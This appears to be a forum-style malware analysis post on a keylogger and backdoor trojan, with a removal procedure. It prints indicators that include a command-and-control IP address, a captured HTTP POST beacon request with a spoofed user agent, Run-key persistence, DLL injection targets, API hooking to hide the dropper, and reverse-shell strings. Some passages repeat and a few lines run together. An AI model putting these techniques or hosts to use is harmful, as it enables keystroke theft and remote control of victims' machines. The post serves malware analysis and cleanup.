According to preliminary results this is trojan with keylogger and backdoor functionality. It uses dll injection (target svchost.exe, explorer.exe) using FDM 2.x (Free Download Manager) as user agent for requests. Connect with 176.9.150.53
Contains following strings
Runs through HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Log from keylogger is near the dropper. To removal - terminate zombie svchost (it is simple to find it - it parent will be explorer) and explorer in same time. Cleanup registry entry + delete dropper with folder.
Posts moved.
POST /Bild/abs.php HTTP/1.1Project file
User-Agent: FDM 2.x
Host: hpmarquardt.de
Content-Length: 254
Cache-Control: no-cache
X:\release\file.pdbnot meaningful.
Contains following strings
RSHELL Could not resolve backconnect hostname %dAdditionally perform API hooking (FindFirstFileW) to hide dropper in X:\Documents and Settings\UserName\Application Data\[randomchars]
RSHELL reconnecting %d
RSHELL Connected succesfully , will fork a shell now
Runs through HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Log from keylogger is near the dropper. To removal - terminate zombie svchost (it is simple to find it - it parent will be explorer) and explorer in same time. Cleanup registry entry + delete dropper with folder.
Posts moved.
Ring0 - the source of inspiration